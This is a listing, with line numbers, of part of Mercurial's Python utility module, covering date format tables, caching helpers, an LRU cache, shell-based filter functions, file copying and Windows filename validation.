512 509 return (vints[0], vints[1], vints[2], extra)
513 510
514 511 # used by parsedate
515 512 defaultdateformats = (
516 513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
517 514 '%Y-%m-%dT%H:%M', # without seconds
518 515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
519 516 '%Y-%m-%dT%H%M', # without seconds
520 517 '%Y-%m-%d %H:%M:%S', # our common legal variant
521 518 '%Y-%m-%d %H:%M', # without seconds
522 519 '%Y-%m-%d %H%M%S', # without :
523 520 '%Y-%m-%d %H%M', # without seconds
524 521 '%Y-%m-%d %I:%M:%S%p',
525 522 '%Y-%m-%d %H:%M',
526 523 '%Y-%m-%d %I:%M%p',
527 524 '%Y-%m-%d',
528 525 '%m-%d',
529 526 '%m/%d',
530 527 '%m/%d/%y',
531 528 '%m/%d/%Y',
532 529 '%a %b %d %H:%M:%S %Y',
533 530 '%a %b %d %I:%M:%S%p %Y',
534 531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
535 532 '%b %d %H:%M:%S %Y',
536 533 '%b %d %I:%M:%S%p %Y',
537 534 '%b %d %H:%M:%S',
538 535 '%b %d %I:%M:%S%p',
539 536 '%b %d %H:%M',
540 537 '%b %d %I:%M%p',
541 538 '%b %d %Y',
542 539 '%b %d',
543 540 '%H:%M:%S',
544 541 '%I:%M:%S%p',
545 542 '%H:%M',
546 543 '%I:%M%p',
547 544 )
548 545
549 546 extendeddateformats = defaultdateformats + (
550 547 "%Y",
551 548 "%Y-%m",
552 549 "%b",
553 550 "%b %Y",
554 551 )
555 552
556 553 def cachefunc(func):
557 554 '''cache the result of function calls'''
558 555 # XXX doesn't handle keywords args
559 556 if func.__code__.co_argcount == 0:
560 557 cache = []
561 558 def f():
562 559 if len(cache) == 0:
563 560 cache.append(func())
564 561 return cache[0]
565 562 return f
566 563 cache = {}
567 564 if func.__code__.co_argcount == 1:
568 565 # we gain a small amount of time because
569 566 # we don't need to pack/unpack the list
570 567 def f(arg):
571 568 if arg not in cache:
572 569 cache[arg] = func(arg)
573 570 return cache[arg]
574 571 else:
575 572 def f(*args):
576 573 if args not in cache:
577 574 cache[args] = func(*args)
578 575 return cache[args]
579 576
580 577 return f
581 578
582 579 class sortdict(collections.OrderedDict):
583 580 '''a simple sorted dictionary
584 581
585 582 >>> d1 = sortdict([('a', 0), ('b', 1)])
586 583 >>> d2 = d1.copy()
587 584 >>> d2
588 585 sortdict([('a', 0), ('b', 1)])
589 586 >>> d2.update([('a', 2)])
590 587 >>> d2.keys() # should still be in last-set order
591 588 ['b', 'a']
592 589 '''
593 590
594 591 def __setitem__(self, key, value):
595 592 if key in self:
596 593 del self[key]
597 594 super(sortdict, self).__setitem__(key, value)
598 595
599 596 if pycompat.ispypy:
600 597 # __setitem__() isn't called as of PyPy 5.8.0
601 598 def update(self, src):
602 599 if isinstance(src, dict):
603 600 src = src.iteritems()
604 601 for k, v in src:
605 602 self[k] = v
606 603
607 604 class transactional(object):
608 605 """Base class for making a transactional type into a context manager."""
609 606 __metaclass__ = abc.ABCMeta
610 607
611 608 @abc.abstractmethod
612 609 def close(self):
613 610 """Successfully closes the transaction."""
614 611
615 612 @abc.abstractmethod
616 613 def release(self):
617 614 """Marks the end of the transaction.
618 615
619 616 If the transaction has not been closed, it will be aborted.
620 617 """
621 618
622 619 def __enter__(self):
623 620 return self
624 621
625 622 def __exit__(self, exc_type, exc_val, exc_tb):
626 623 try:
627 624 if exc_type is None:
628 625 self.close()
629 626 finally:
630 627 self.release()
631 628
632 629 @contextlib.contextmanager
633 630 def acceptintervention(tr=None):
634 631 """A context manager that closes the transaction on InterventionRequired
635 632
636 633 If no transaction was provided, this simply runs the body and returns
637 634 """
638 635 if not tr:
639 636 yield
640 637 return
641 638 try:
642 639 yield
643 640 tr.close()
644 641 except error.InterventionRequired:
645 642 tr.close()
646 643 raise
647 644 finally:
648 645 tr.release()
649 646
650 647 @contextlib.contextmanager
651 648 def nullcontextmanager():
652 649 yield
653 650
654 651 class _lrucachenode(object):
655 652 """A node in a doubly linked list.
656 653
657 654 Holds a reference to nodes on either side as well as a key-value
658 655 pair for the dictionary entry.
659 656 """
660 657 __slots__ = (u'next', u'prev', u'key', u'value')
661 658
662 659 def __init__(self):
663 660 self.next = None
664 661 self.prev = None
665 662
666 663 self.key = _notset
667 664 self.value = None
668 665
669 666 def markempty(self):
670 667 """Mark the node as emptied."""
671 668 self.key = _notset
672 669
673 670 class lrucachedict(object):
674 671 """Dict that caches most recent accesses and sets.
675 672
676 673 The dict consists of an actual backing dict - indexed by original
677 674 key - and a doubly linked circular list defining the order of entries in
678 675 the cache.
679 676
680 677 The head node is the newest entry in the cache. If the cache is full,
681 678 we recycle head.prev and make it the new head. Cache accesses result in
682 679 the node being moved to before the existing head and being marked as the
683 680 new head node.
684 681 """
685 682 def __init__(self, max):
686 683 self._cache = {}
687 684
688 685 self._head = head = _lrucachenode()
689 686 head.prev = head
690 687 head.next = head
691 688 self._size = 1
692 689 self._capacity = max
693 690
694 691 def __len__(self):
695 692 return len(self._cache)
696 693
697 694 def __contains__(self, k):
698 695 return k in self._cache
699 696
700 697 def __iter__(self):
701 698 # We don't have to iterate in cache order, but why not.
702 699 n = self._head
703 700 for i in range(len(self._cache)):
704 701 yield n.key
705 702 n = n.next
706 703
707 704 def __getitem__(self, k):
708 705 node = self._cache[k]
709 706 self._movetohead(node)
710 707 return node.value
711 708
712 709 def __setitem__(self, k, v):
713 710 node = self._cache.get(k)
714 711 # Replace existing value and mark as newest.
715 712 if node is not None:
716 713 node.value = v
717 714 self._movetohead(node)
718 715 return
719 716
720 717 if self._size < self._capacity:
721 718 node = self._addcapacity()
722 719 else:
723 720 # Grab the last/oldest item.
724 721 node = self._head.prev
725 722
726 723 # At capacity. Kill the old entry.
727 724 if node.key is not _notset:
728 725 del self._cache[node.key]
729 726
730 727 node.key = k
731 728 node.value = v
732 729 self._cache[k] = node
733 730 # And mark it as newest entry. No need to adjust order since it
734 731 # is already self._head.prev.
735 732 self._head = node
736 733
737 734 def __delitem__(self, k):
738 735 node = self._cache.pop(k)
739 736 node.markempty()
740 737
741 738 # Temporarily mark as newest item before re-adjusting head to make
742 739 # this node the oldest item.
743 740 self._movetohead(node)
744 741 self._head = node.next
745 742
746 743 # Additional dict methods.
747 744
748 745 def get(self, k, default=None):
749 746 try:
750 747 return self._cache[k].value
751 748 except KeyError:
752 749 return default
753 750
754 751 def clear(self):
755 752 n = self._head
756 753 while n.key is not _notset:
757 754 n.markempty()
758 755 n = n.next
759 756
760 757 self._cache.clear()
761 758
762 759 def copy(self):
763 760 result = lrucachedict(self._capacity)
764 761 n = self._head.prev
765 762 # Iterate in oldest-to-newest order, so the copy has the right ordering
766 763 for i in range(len(self._cache)):
767 764 result[n.key] = n.value
768 765 n = n.prev
769 766 return result
770 767
771 768 def _movetohead(self, node):
772 769 """Mark a node as the newest, making it the new head.
773 770
774 771 When a node is accessed, it becomes the freshest entry in the LRU
775 772 list, which is denoted by self._head.
776 773
777 774 Visually, let's make ``N`` the new head node (* denotes head):
778 775
779 776 previous/oldest <-> head <-> next/next newest
780 777
781 778 ----<->--- A* ---<->-----
782 779 | |
783 780 E <-> D <-> N <-> C <-> B
784 781
785 782 To:
786 783
787 784 ----<->--- N* ---<->-----
788 785 | |
789 786 E <-> D <-> C <-> B <-> A
790 787
791 788 This requires the following moves:
792 789
793 790 C.next = D (node.prev.next = node.next)
794 791 D.prev = C (node.next.prev = node.prev)
795 792 E.next = N (head.prev.next = node)
796 793 N.prev = E (node.prev = head.prev)
797 794 N.next = A (node.next = head)
798 795 A.prev = N (head.prev = node)
799 796 """
800 797 head = self._head
801 798 # C.next = D
802 799 node.prev.next = node.next
803 800 # D.prev = C
804 801 node.next.prev = node.prev
805 802 # N.prev = E
806 803 node.prev = head.prev
807 804 # N.next = A
808 805 # It is tempting to do just "head" here, however if node is
809 806 # adjacent to head, this will do bad things.
810 807 node.next = head.prev.next
811 808 # E.next = N
812 809 node.next.prev = node
813 810 # A.prev = N
814 811 node.prev.next = node
815 812
816 813 self._head = node
817 814
818 815 def _addcapacity(self):
819 816 """Add a node to the circular linked list.
820 817
821 818 The new node is inserted before the head node.
822 819 """
823 820 head = self._head
824 821 node = _lrucachenode()
825 822 head.prev.next = node
826 823 node.prev = head.prev
827 824 node.next = head
828 825 head.prev = node
829 826 self._size += 1
830 827 return node
831 828
832 829 def lrucachefunc(func):
833 830 '''cache most recent results of function calls'''
834 831 cache = {}
835 832 order = collections.deque()
836 833 if func.__code__.co_argcount == 1:
837 834 def f(arg):
838 835 if arg not in cache:
839 836 if len(cache) > 20:
840 837 del cache[order.popleft()]
841 838 cache[arg] = func(arg)
842 839 else:
843 840 order.remove(arg)
844 841 order.append(arg)
845 842 return cache[arg]
846 843 else:
847 844 def f(*args):
848 845 if args not in cache:
849 846 if len(cache) > 20:
850 847 del cache[order.popleft()]
851 848 cache[args] = func(*args)
852 849 else:
853 850 order.remove(args)
854 851 order.append(args)
855 852 return cache[args]
856 853
857 854 return f
858 855
859 856 class propertycache(object):
860 857 def __init__(self, func):
861 858 self.func = func
862 859 self.name = func.__name__
863 860 def __get__(self, obj, type=None):
864 861 result = self.func(obj)
865 862 self.cachevalue(obj, result)
866 863 return result
867 864
868 865 def cachevalue(self, obj, value):
869 866 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
870 867 obj.__dict__[self.name] = value
871 868
872 869 def pipefilter(s, cmd):
873 870 '''filter string S through command CMD, returning its output'''
874 871 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
875 872 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
876 873 pout, perr = p.communicate(s)
877 874 return pout
878 875
879 876 def tempfilter(s, cmd):
880 877 '''filter string S through a pair of temporary files with CMD.
881 878 CMD is used as a template to create the real command to be run,
882 879 with the strings INFILE and OUTFILE replaced by the real names of
883 880 the temporary files generated.'''
884 881 inname, outname = None, None
885 882 try:
886 883 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
887 884 fp = os.fdopen(infd, pycompat.sysstr('wb'))
888 885 fp.write(s)
889 886 fp.close()
890 887 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
891 888 os.close(outfd)
892 889 cmd = cmd.replace('INFILE', inname)
893 890 cmd = cmd.replace('OUTFILE', outname)
894 891 code = os.system(cmd)
895 892 if pycompat.sysplatform == 'OpenVMS' and code & 1:
896 893 code = 0
897 894 if code:
898 895 raise Abort(_("command '%s' failed: %s") %
899 896 (cmd, explainexit(code)))
900 897 return readfile(outname)
901 898 finally:
902 899 try:
903 900 if inname:
904 901 os.unlink(inname)
905 902 except OSError:
906 903 pass
907 904 try:
908 905 if outname:
909 906 os.unlink(outname)
910 907 except OSError:
911 908 pass
912 909
913 910 filtertable = {
914 911 'tempfile:': tempfilter,
915 912 'pipe:': pipefilter,
916 913 }
917 914
918 915 def filter(s, cmd):
919 916 "filter a string through a command that transforms its input to its output"
920 917 for name, fn in filtertable.iteritems():
921 918 if cmd.startswith(name):
922 919 return fn(s, cmd[len(name):].lstrip())
923 920 return pipefilter(s, cmd)
924 921
925 922 def binary(s):
926 923 """return true if a string is binary data"""
927 924 return bool(s and '\0' in s)
928 925
929 926 def increasingchunks(source, min=1024, max=65536):
930 927 '''return no less than min bytes per chunk while data remains,
931 928 doubling min after each chunk until it reaches max'''
932 929 def log2(x):
933 930 if not x:
934 931 return 0
935 932 i = 0
936 933 while x:
937 934 x >>= 1
938 935 i += 1
939 936 return i - 1
940 937
941 938 buf = []
942 939 blen = 0
943 940 for chunk in source:
944 941 buf.append(chunk)
945 942 blen += len(chunk)
946 943 if blen >= min:
947 944 if min < max:
948 945 min = min << 1
949 946 nmin = 1 << log2(blen)
950 947 if nmin > min:
951 948 min = nmin
952 949 if min > max:
953 950 min = max
954 951 yield ''.join(buf)
955 952 blen = 0
956 953 buf = []
957 954 if buf:
958 955 yield ''.join(buf)
959 956
960 957 Abort = error.Abort
961 958
962 959 def always(fn):
963 960 return True
964 961
965 962 def never(fn):
966 963 return False
967 964
968 965 def nogc(func):
969 966 """disable garbage collector
970 967
971 968 Python's garbage collector triggers a GC each time a certain number of
972 969 container objects (the number being defined by gc.get_threshold()) are
973 970 allocated even when marked not to be tracked by the collector. Tracking has
974 971 no effect on when GCs are triggered, only on what objects the GC looks
975 972 into. As a workaround, disable GC while building complex (huge)
976 973 containers.
977 974
978 975 This garbage collector issue have been fixed in 2.7. But it still affect
979 976 CPython's performance.
980 977 """
981 978 def wrapper(*args, **kwargs):
982 979 gcenabled = gc.isenabled()
983 980 gc.disable()
984 981 try:
985 982 return func(*args, **kwargs)
986 983 finally:
987 984 if gcenabled:
988 985 gc.enable()
989 986 return wrapper
990 987
991 988 if pycompat.ispypy:
992 989 # PyPy runs slower with gc disabled
993 990 nogc = lambda x: x
994 991
995 992 def pathto(root, n1, n2):
996 993 '''return the relative path from one place to another.
997 994 root should use os.sep to separate directories
998 995 n1 should use os.sep to separate directories
999 996 n2 should use "/" to separate directories
1000 997 returns an os.sep-separated path.
1001 998
1002 999 If n1 is a relative path, it's assumed it's
1003 1000 relative to root.
1004 1001 n2 should always be relative to root.
1005 1002 '''
1006 1003 if not n1:
1007 1004 return localpath(n2)
1008 1005 if os.path.isabs(n1):
1009 1006 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1010 1007 return os.path.join(root, localpath(n2))
1011 1008 n2 = '/'.join((pconvert(root), n2))
1012 1009 a, b = splitpath(n1), n2.split('/')
1013 1010 a.reverse()
1014 1011 b.reverse()
1015 1012 while a and b and a[-1] == b[-1]:
1016 1013 a.pop()
1017 1014 b.pop()
1018 1015 b.reverse()
1019 1016 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1020 1017
1021 1018 def mainfrozen():
1022 1019 """return True if we are a frozen executable.
1023 1020
1024 1021 The code supports py2exe (most common, Windows only) and tools/freeze
1025 1022 (portable, not much used).
1026 1023 """
1027 1024 return (safehasattr(sys, "frozen") or # new py2exe
1028 1025 safehasattr(sys, "importers") or # old py2exe
1029 1026 imp.is_frozen(u"__main__")) # tools/freeze
1030 1027
1031 1028 # the location of data files matching the source code
1032 1029 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1033 1030 # executable version (py2exe) doesn't support __file__
1034 1031 datapath = os.path.dirname(pycompat.sysexecutable)
1035 1032 else:
1036 1033 datapath = os.path.dirname(pycompat.fsencode(__file__))
1037 1034
1038 1035 i18n.setdatapath(datapath)
1039 1036
1040 1037 _hgexecutable = None
1041 1038
1042 1039 def hgexecutable():
1043 1040 """return location of the 'hg' executable.
1044 1041
1045 1042 Defaults to $HG or 'hg' in the search path.
1046 1043 """
1047 1044 if _hgexecutable is None:
1048 1045 hg = encoding.environ.get('HG')
1049 1046 mainmod = sys.modules[pycompat.sysstr('__main__')]
1050 1047 if hg:
1051 1048 _sethgexecutable(hg)
1052 1049 elif mainfrozen():
1053 1050 if getattr(sys, 'frozen', None) == 'macosx_app':
1054 1051 # Env variable set by py2app
1055 1052 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1056 1053 else:
1057 1054 _sethgexecutable(pycompat.sysexecutable)
1058 1055 elif (os.path.basename(
1059 1056 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1060 1057 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1061 1058 else:
1062 1059 exe = findexe('hg') or os.path.basename(sys.argv[0])
1063 1060 _sethgexecutable(exe)
1064 1061 return _hgexecutable
1065 1062
1066 1063 def _sethgexecutable(path):
1067 1064 """set location of the 'hg' executable"""
1068 1065 global _hgexecutable
1069 1066 _hgexecutable = path
1070 1067
1071 1068 def _isstdout(f):
1072 1069 fileno = getattr(f, 'fileno', None)
1073 1070 return fileno and fileno() == sys.__stdout__.fileno()
1074 1071
1075 1072 def shellenviron(environ=None):
1076 1073 """return environ with optional override, useful for shelling out"""
1077 1074 def py2shell(val):
1078 1075 'convert python object into string that is useful to shell'
1079 1076 if val is None or val is False:
1080 1077 return '0'
1081 1078 if val is True:
1082 1079 return '1'
1083 1080 return str(val)
1084 1081 env = dict(encoding.environ)
1085 1082 if environ:
1086 1083 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1087 1084 env['HG'] = hgexecutable()
1088 1085 return env
1089 1086
1090 1087 def system(cmd, environ=None, cwd=None, out=None):
1091 1088 '''enhanced shell command execution.
1092 1089 run with environment maybe modified, maybe in different dir.
1093 1090
1094 1091 if out is specified, it is assumed to be a file-like object that has a
1095 1092 write() method. stdout and stderr will be redirected to out.'''
1096 1093 try:
1097 1094 stdout.flush()
1098 1095 except Exception:
1099 1096 pass
1100 1097 cmd = quotecommand(cmd)
1101 1098 env = shellenviron(environ)
1102 1099 if out is None or _isstdout(out):
1103 1100 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1104 1101 env=env, cwd=cwd)
1105 1102 else:
1106 1103 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1107 1104 env=env, cwd=cwd, stdout=subprocess.PIPE,
1108 1105 stderr=subprocess.STDOUT)
1109 1106 for line in iter(proc.stdout.readline, ''):
1110 1107 out.write(line)
1111 1108 proc.wait()
1112 1109 rc = proc.returncode
1113 1110 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1114 1111 rc = 0
1115 1112 return rc
1116 1113
1117 1114 def checksignature(func):
1118 1115 '''wrap a function with code to check for calling errors'''
1119 1116 def check(*args, **kwargs):
1120 1117 try:
1121 1118 return func(*args, **kwargs)
1122 1119 except TypeError:
1123 1120 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1124 1121 raise error.SignatureError
1125 1122 raise
1126 1123
1127 1124 return check
1128 1125
1129 1126 # a whilelist of known filesystems where hardlink works reliably
1130 1127 _hardlinkfswhitelist = {
1131 1128 'btrfs',
1132 1129 'ext2',
1133 1130 'ext3',
1134 1131 'ext4',
1135 1132 'hfs',
1136 1133 'jfs',
1137 1134 'reiserfs',
1138 1135 'tmpfs',
1139 1136 'ufs',
1140 1137 'xfs',
1141 1138 'zfs',
1142 1139 }
1143 1140
1144 1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1145 1142 '''copy a file, preserving mode and optionally other stat info like
1146 1143 atime/mtime
1147 1144
1148 1145 checkambig argument is used with filestat, and is useful only if
1149 1146 destination file is guarded by any lock (e.g. repo.lock or
1150 1147 repo.wlock).
1151 1148
1152 1149 copystat and checkambig should be exclusive.
1153 1150 '''
1154 1151 assert not (copystat and checkambig)
1155 1152 oldstat = None
1156 1153 if os.path.lexists(dest):
1157 1154 if checkambig:
1158 1155 oldstat = checkambig and filestat.frompath(dest)
1159 1156 unlink(dest)
1160 1157 if hardlink:
1161 1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1162 1159 # unless we are confident that dest is on a whitelisted filesystem.
1163 1160 try:
1164 1161 fstype = getfstype(os.path.dirname(dest))
1165 1162 except OSError:
1166 1163 fstype = None
1167 1164 if fstype not in _hardlinkfswhitelist:
1168 1165 hardlink = False
1169 1166 if hardlink:
1170 1167 try:
1171 1168 oslink(src, dest)
1172 1169 return
1173 1170 except (IOError, OSError):
1174 1171 pass # fall back to normal copy
1175 1172 if os.path.islink(src):
1176 1173 os.symlink(os.readlink(src), dest)
1177 1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1178 1175 # for them anyway
1179 1176 else:
1180 1177 try:
1181 1178 shutil.copyfile(src, dest)
1182 1179 if copystat:
1183 1180 # copystat also copies mode
1184 1181 shutil.copystat(src, dest)
1185 1182 else:
1186 1183 shutil.copymode(src, dest)
1187 1184 if oldstat and oldstat.stat:
1188 1185 newstat = filestat.frompath(dest)
1189 1186 if newstat.isambig(oldstat):
1190 1187 # stat of copied file is ambiguous to original one
1191 1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1192 1189 os.utime(dest, (advanced, advanced))
1193 1190 except shutil.Error as inst:
1194 1191 raise Abort(str(inst))
1195 1192
1196 1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1197 1194 """Copy a directory tree using hardlinks if possible."""
1198 1195 num = 0
1199 1196
1200 1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1201 1198
1202 1199 if os.path.isdir(src):
1203 1200 if hardlink is None:
1204 1201 hardlink = (os.stat(src).st_dev ==
1205 1202 os.stat(os.path.dirname(dst)).st_dev)
1206 1203 topic = gettopic()
1207 1204 os.mkdir(dst)
1208 1205 for name, kind in listdir(src):
1209 1206 srcname = os.path.join(src, name)
1210 1207 dstname = os.path.join(dst, name)
1211 1208 def nprog(t, pos):
1212 1209 if pos is not None:
1213 1210 return progress(t, pos + num)
1214 1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1215 1212 num += n
1216 1213 else:
1217 1214 if hardlink is None:
1218 1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1219 1216 os.stat(os.path.dirname(dst)).st_dev)
1220 1217 topic = gettopic()
1221 1218
1222 1219 if hardlink:
1223 1220 try:
1224 1221 oslink(src, dst)
1225 1222 except (IOError, OSError):
1226 1223 hardlink = False
1227 1224 shutil.copy(src, dst)
1228 1225 else:
1229 1226 shutil.copy(src, dst)
1230 1227 num += 1
1231 1228 progress(topic, num)
1232 1229 progress(topic, None)
1233 1230
1234 1231 return hardlink, num
1235 1232
1236 1233 _winreservednames = b'''con prn aux nul
1237 1234 com1 com2 com3 com4 com5 com6 com7 com8 com9
1238 1235 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1239 1236 _winreservedchars = ':*?"<>|'
1240 1237 def checkwinfilename(path):
1241 1238 r'''Check that the base-relative path is a valid filename on Windows.
1242 1239 Returns None if the path is ok, or a UI string describing the problem.
1243 1240
1244 1241 >>> checkwinfilename("just/a/normal/path")
1245 1242 >>> checkwinfilename("foo/bar/con.xml")
1246 1243 "filename contains 'con', which is reserved on Windows"
1247 1244 >>> checkwinfilename("foo/con.xml/bar")
1248 1245 "filename contains 'con', which is reserved on Windows"
1249 1246 >>> checkwinfilename("foo/bar/xml.con")
1250 1247 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1251 1248 "filename contains 'AUX', which is reserved on Windows"
1252 1249 >>> checkwinfilename("foo/bar/bla:.txt")
1253 1250 "filename contains ':', which is reserved on Windows"
1254 1251 >>> checkwinfilename("foo/bar/b\07la.txt")
1255 1252 "filename contains '\\x07', which is invalid on Windows"
1256 1253 >>> checkwinfilename("foo/bar/bla ")
1257 1254 "filename ends with ' ', which is not allowed on Windows"
1258 1255 >>> checkwinfilename("../bar")
1259 1256 >>> checkwinfilename("foo\\")
1260 1257 "filename ends with '\\', which is invalid on Windows"
1261 1258 >>> checkwinfilename("foo\\/bar")
1262 1259 "directory name ends with '\\', which is invalid on Windows"
1263 1260 '''
1264 1261 if path.endswith('\\'):
1265 1262 return _("filename ends with '\\', which is invalid on Windows")
1266 1263 if '\\/' in path:
1267 1264 return _("directory name ends with '\\', which is invalid on Windows")
1268 1265 for n in path.replace('\\', '/').split('/'):
1269 1266 if not n:
1270 1267 continue
1271 1268 for c in _filenamebytestr(n):
1272 1269 if c in _winreservedchars:
1273 1270 return _("filename contains '%s', which is reserved "
1274 1271 "on Windows") % c
1275 1272 if ord(c) <= 31:
1276 1273 return _("filename contains %r, which is invalid "
1277 1274 "on Windows") % c
1278 1275 base = n.split('.')[0]
1279 1276 if base and base.lower() in _winreservednames:
1280 1277 return _("filename contains '%s', which is reserved "
1281 1278 "on Windows") % base
1282 1279 t = n[-1]
1283 1280 if t in '. ' and n not in '..':
1284 1281 return _("filename ends with '%s', which is not allowed "
1285 1282 "on Windows") % t
1286 1283
1287 1284 if pycompat.osname == 'nt':
1288 1285 checkosfilename = checkwinfilename
1289 1286 timer = time.clock
1290 1287 else:
1291 1288 checkosfilename = platform.checkosfilename
1292 1289 timer = time.time
1293 1290
1294 1291 if safehasattr(time, "perf_counter"):
1295 1292 timer = time.perf_counter
1296 1293
1297 1294 def makelock(info, pathname):
1298 1295 try:
1299 1296 return os.symlink(info, pathname)
1300 1297 except OSError as why:
1301 1298 if why.errno == errno.EEXIST:
1302 1299 raise
1303 1300 except AttributeError: # no symlink in os
1304 1301 pass
1305 1302
1306 1303 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1307 1304 os.write(ld, info)
1308 1305 os.close(ld)
1309 1306
1310 1307 def readlock(pathname):
1311 1308 try:
1312 1309 return os.readlink(pathname)
1313 1310 except OSError as why:
1314 1311 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1315 1312 raise
1316 1313 except AttributeError: # no symlink in os
1317 1314 pass
1318 1315 fp = posixfile(pathname)
1319 1316 r = fp.read()
1320 1317 fp.close()
1321 1318 return r
1322 1319
1323 1320 def fstat(fp):
1324 1321 '''stat file object that may not have fileno method.'''
1325 1322 try:
1326 1323 return os.fstat(fp.fileno())
1327 1324 except AttributeError:
1328 1325 return os.stat(fp.name)
1329 1326
1330 1327 # File system features
1331 1328
1332 1329 def fscasesensitive(path):
1333 1330 """
1334 1331 Return true if the given path is on a case-sensitive filesystem
1335 1332
1336 1333 Requires a path (like /foo/.hg) ending with a foldable final
1337 1334 directory component.
1338 1335 """
1339 1336 s1 = os.lstat(path)
1340 1337 d, b = os.path.split(path)
1341 1338 b2 = b.upper()
1342 1339 if b == b2:
1343 1340 b2 = b.lower()
1344 1341 if b == b2:
1345 1342 return True # no evidence against case sensitivity
1346 1343 p2 = os.path.join(d, b2)
1347 1344 try:
1348 1345 s2 = os.lstat(p2)
1349 1346 if s2 == s1:
1350 1347 return False
1351 1348 return True
1352 1349 except OSError:
1353 1350 return True
1354 1351
1355 1352 try:
1356 1353 import re2
1357 1354 _re2 = None
1358 1355 except ImportError:
1359 1356 _re2 = False
1360 1357
1361 1358 class _re(object):
1362 1359 def _checkre2(self):
1363 1360 global _re2
1364 1361 try:
1365 1362 # check if match works, see issue3964
1366 1363 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1367 1364 except ImportError:
1368 1365 _re2 = False
1369 1366
1370 1367 def compile(self, pat, flags=0):
1371 1368 '''Compile a regular expression, using re2 if possible
1372 1369
1373 1370 For best performance, use only re2-compatible regexp features. The
1374 1371 only flags from the re module that are re2-compatible are
1375 1372 IGNORECASE and MULTILINE.'''
1376 1373 if _re2 is None:
1377 1374 self._checkre2()
1378 1375 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1379 1376 if flags & remod.IGNORECASE:
1380 1377 pat = '(?i)' + pat
1381 1378 if flags & remod.MULTILINE:
1382 1379 pat = '(?m)' + pat
1383 1380 try:
1384 1381 return re2.compile(pat)
1385 1382 except re2.error:
1386 1383 pass
1387 1384 return remod.compile(pat, flags)
1388 1385
1389 1386 @propertycache
1390 1387 def escape(self):
1391 1388 '''Return the version of escape corresponding to self.compile.
1392 1389
1393 1390 This is imperfect because whether re2 or re is used for a particular
1394 1391 function depends on the flags, etc, but it's the best we can do.
1395 1392 '''
1396 1393 global _re2
1397 1394 if _re2 is None:
1398 1395 self._checkre2()
1399 1396 if _re2:
1400 1397 return re2.escape
1401 1398 else:
1402 1399 return remod.escape
1403 1400
1404 1401 re = _re()
1405 1402
1406 1403 _fspathcache = {}
1407 1404 def fspath(name, root):
1408 1405 '''Get name in the case stored in the filesystem
1409 1406
1410 1407 The name should be relative to root, and be normcase-ed for efficiency.
1411 1408
1412 1409 Note that this function is unnecessary, and should not be
1413 1410 called, for case-sensitive filesystems (simply because it's expensive).
1414 1411
1415 1412 The root should be normcase-ed, too.
1416 1413 '''
1417 1414 def _makefspathcacheentry(dir):
1418 1415 return dict((normcase(n), n) for n in os.listdir(dir))
1419 1416
1420 1417 seps = pycompat.ossep
1421 1418 if pycompat.osaltsep:
1422 1419 seps = seps + pycompat.osaltsep
1423 1420 # Protect backslashes. This gets silly very quickly.
1424 1421 seps.replace('\\','\\\\')
1425 1422 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1426 1423 dir = os.path.normpath(root)
1427 1424 result = []
1428 1425 for part, sep in pattern.findall(name):
1429 1426 if sep:
1430 1427 result.append(sep)
1431 1428 continue
1432 1429
1433 1430 if dir not in _fspathcache:
1434 1431 _fspathcache[dir] = _makefspathcacheentry(dir)
1435 1432 contents = _fspathcache[dir]
1436 1433
1437 1434 found = contents.get(part)
1438 1435 if not found:
1439 1436 # retry "once per directory" per "dirstate.walk" which
1440 1437 # may take place for each patches of "hg qpush", for example
1441 1438 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1442 1439 found = contents.get(part)
1443 1440
1444 1441 result.append(found or part)
1445 1442 dir = os.path.join(dir, part)
1446 1443
1447 1444 return ''.join(result)
1448 1445
1449 1446 def getfstype(dirpath):
1450 1447 '''Get the filesystem type name from a directory (best-effort)
1451 1448
1452 1449 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1453 1450 '''
1454 1451 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1455 1452
1456 1453 def checknlink(testfile):
1457 1454 '''check whether hardlink count reporting works properly'''
1458 1455
1459 1456 # testfile may be open, so we need a separate file for checking to
1460 1457 # work around issue2543 (or testfile may get lost on Samba shares)
1461 1458 f1 = testfile + ".hgtmp1"
1462 1459 if os.path.lexists(f1):
1463 1460 return False
1464 1461 try:
1465 1462 posixfile(f1, 'w').close()
1466 1463 except IOError:
1467 1464 try:
1468 1465 os.unlink(f1)
1469 1466 except OSError:
1470 1467 pass
1471 1468 return False
1472 1469
1473 1470 f2 = testfile + ".hgtmp2"
